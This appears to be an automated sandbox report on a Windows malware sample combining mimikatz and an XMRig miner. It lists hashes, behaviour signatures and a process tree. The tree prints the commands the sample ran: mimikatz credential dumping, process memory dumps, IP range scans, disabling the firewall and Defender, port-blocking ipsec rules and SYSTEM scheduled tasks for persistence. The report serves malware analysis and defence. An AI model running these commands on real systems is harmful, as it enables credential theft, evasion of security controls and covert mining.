Analysis

  • max time kernel
    126s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-11-2024 09:38

General

  • Target

    2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe

  • Size

    9.7MB

  • MD5

    5a8185e3c49304f8f94aa2dafdafd5a5

  • SHA1

    c352dd312deeae9215d3df6eabf63194b8217069

  • SHA256

    41184899f11833556ed5d9d7e209adcf0f0810c6fa09bc6671a42d1f71c31177

  • SHA512

    0e4df817e9b14cc0b587d0be12385d65d59e48f7e9c30a1317fb30694319350fb99e8447ef3ceee3ac242f5978ff0174e3ead46c9c22a2779cbbc9567acb08a0

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (18873) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1692
      • C:\Windows\TEMP\untipbtiz\ltbtbc.exe
        "C:\Windows\TEMP\untipbtiz\ltbtbc.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4488
    • C:\Users\Admin\AppData\Local\Temp\2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4748
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ybemumnz\mgmtcbi.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:3264
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3888
        • C:\Windows\ybemumnz\mgmtcbi.exe
          C:\Windows\ybemumnz\mgmtcbi.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3980
    • C:\Windows\ybemumnz\mgmtcbi.exe
      C:\Windows\ybemumnz\mgmtcbi.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1724
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1196
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:1312
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2332
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
              PID:936
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4824
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3152
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:1076
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:3392
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2392
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\jhetmctcv\bctzbzczb\wpcap.exe /S
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2140
            • C:\Windows\jhetmctcv\bctzbzczb\wpcap.exe
              C:\Windows\jhetmctcv\bctzbzczb\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3028
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1668
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:448
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4368
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4388
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4004
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:5072
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:3608
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2560
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
              PID:1480
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3648
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2156
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:1196
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:664
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4168
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jhetmctcv\bctzbzczb\Scant.txt
              2⤵
              • System Location Discovery: System Language Discovery
              PID:4888
              • C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe
                C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jhetmctcv\bctzbzczb\Scant.txt
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:3996
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\jhetmctcv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\jhetmctcv\Corporate\log.txt
              2⤵
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:2036
              • C:\Windows\jhetmctcv\Corporate\vfshost.exe
                C:\Windows\jhetmctcv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2340
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "jbemublie" /ru system /tr "cmd /c C:\Windows\ime\mgmtcbi.exe"
              2⤵
                PID:3132
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1656
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "jbemublie" /ru system /tr "cmd /c C:\Windows\ime\mgmtcbi.exe"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3532
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "umbbbtict" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ybemumnz\mgmtcbi.exe /p everyone:F"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3012
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1296
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "umbbbtict" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ybemumnz\mgmtcbi.exe /p everyone:F"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4196
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bwctviivv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\untipbtiz\ltbtbc.exe /p everyone:F"
                2⤵
                  PID:1060
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:5092
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "bwctviivv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\untipbtiz\ltbtbc.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:1564
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:5040
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3024
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2956
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1532
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4736
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:648
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2644
                • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                  C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 792 C:\Windows\TEMP\jhetmctcv\792.dmp
                  2⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4584
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2292
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2156
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2740
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:316
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:664
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1816
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4556
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop SharedAccess
                      4⤵
                        PID:5020
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4280
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode mode=disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:4692
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh Advfirewall set allprofiles state off
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1728
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4932
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4708
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1076
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop MpsSvc
                        4⤵
                          PID:4416
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop WinDefend
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:5056
                      • C:\Windows\SysWOW64\net.exe
                        net stop WinDefend
                        3⤵
                          PID:4616
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop WinDefend
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:4624
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop wuauserv
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1704
                        • C:\Windows\SysWOW64\net.exe
                          net stop wuauserv
                          3⤵
                            PID:5040
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4376
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config MpsSvc start= disabled
                          2⤵
                            PID:980
                            • C:\Windows\SysWOW64\sc.exe
                              sc config MpsSvc start= disabled
                              3⤵
                              • Launches sc.exe
                              PID:1824
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config SharedAccess start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4704
                            • C:\Windows\SysWOW64\sc.exe
                              sc config SharedAccess start= disabled
                              3⤵
                              • Launches sc.exe
                              PID:3300
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config WinDefend start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4564
                            • C:\Windows\SysWOW64\sc.exe
                              sc config WinDefend start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1084
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config wuauserv start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:3248
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4284
                          • C:\Windows\TEMP\xohudmc.exe
                            C:\Windows\TEMP\xohudmc.exe
                            2⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            • Suspicious use of SetWindowsHookEx
                            PID:488
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 388 C:\Windows\TEMP\jhetmctcv\388.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4228
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 1692 C:\Windows\TEMP\jhetmctcv\1692.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:572
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 2632 C:\Windows\TEMP\jhetmctcv\2632.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1280
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 2708 C:\Windows\TEMP\jhetmctcv\2708.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4268
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 2928 C:\Windows\TEMP\jhetmctcv\2928.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4888
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 2060 C:\Windows\TEMP\jhetmctcv\2060.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1724
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 3748 C:\Windows\TEMP\jhetmctcv\3748.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1568
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 3836 C:\Windows\TEMP\jhetmctcv\3836.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2780
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 3900 C:\Windows\TEMP\jhetmctcv\3900.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2436
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 4028 C:\Windows\TEMP\jhetmctcv\4028.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1444
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 2468 C:\Windows\TEMP\jhetmctcv\2468.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4860
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 1044 C:\Windows\TEMP\jhetmctcv\1044.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            PID:1532
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 2496 C:\Windows\TEMP\jhetmctcv\2496.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:940
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 1988 C:\Windows\TEMP\jhetmctcv\1988.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1116
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 4468 C:\Windows\TEMP\jhetmctcv\4468.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:244
                          • C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe
                            C:\Windows\TEMP\jhetmctcv\iyibcmiuc.exe -accepteula -mp 1472 C:\Windows\TEMP\jhetmctcv\1472.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:788
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c C:\Windows\jhetmctcv\bctzbzczb\scan.bat
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1300
                            • C:\Windows\jhetmctcv\bctzbzczb\btuizeiim.exe
                              btuizeiim.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                              3⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              PID:4524
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                            2⤵
                              PID:5824
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                3⤵
                                  PID:5900
                                • C:\Windows\SysWOW64\cacls.exe
                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                  3⤵
                                    PID:1952
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                      PID:5112
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                      3⤵
                                        PID:220
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                          PID:2704
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                          3⤵
                                            PID:3092
                                      • C:\Windows\SysWOW64\umueiy.exe
                                        C:\Windows\SysWOW64\umueiy.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5032
                                      • C:\Windows\system32\cmd.EXE
                                        C:\Windows\system32\cmd.EXE /c C:\Windows\ime\mgmtcbi.exe
                                        1⤵
                                          PID:1976
                                          • C:\Windows\ime\mgmtcbi.exe
                                            C:\Windows\ime\mgmtcbi.exe
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:2396
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ybemumnz\mgmtcbi.exe /p everyone:F
                                          1⤵
                                            PID:3948
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              2⤵
                                                PID:3296
                                              • C:\Windows\system32\cacls.exe
                                                cacls C:\Windows\ybemumnz\mgmtcbi.exe /p everyone:F
                                                2⤵
                                                  PID:2876
                                              • C:\Windows\system32\cmd.EXE
                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\untipbtiz\ltbtbc.exe /p everyone:F
                                                1⤵
                                                  PID:2140
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                    2⤵
                                                      PID:3992
                                                    • C:\Windows\system32\cacls.exe
                                                      cacls C:\Windows\TEMP\untipbtiz\ltbtbc.exe /p everyone:F
                                                      2⤵
                                                        PID:2432
                                                    • C:\Windows\system32\cmd.EXE
                                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ybemumnz\mgmtcbi.exe /p everyone:F
                                                      1⤵
                                                        PID:5756
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          2⤵
                                                            PID:2500
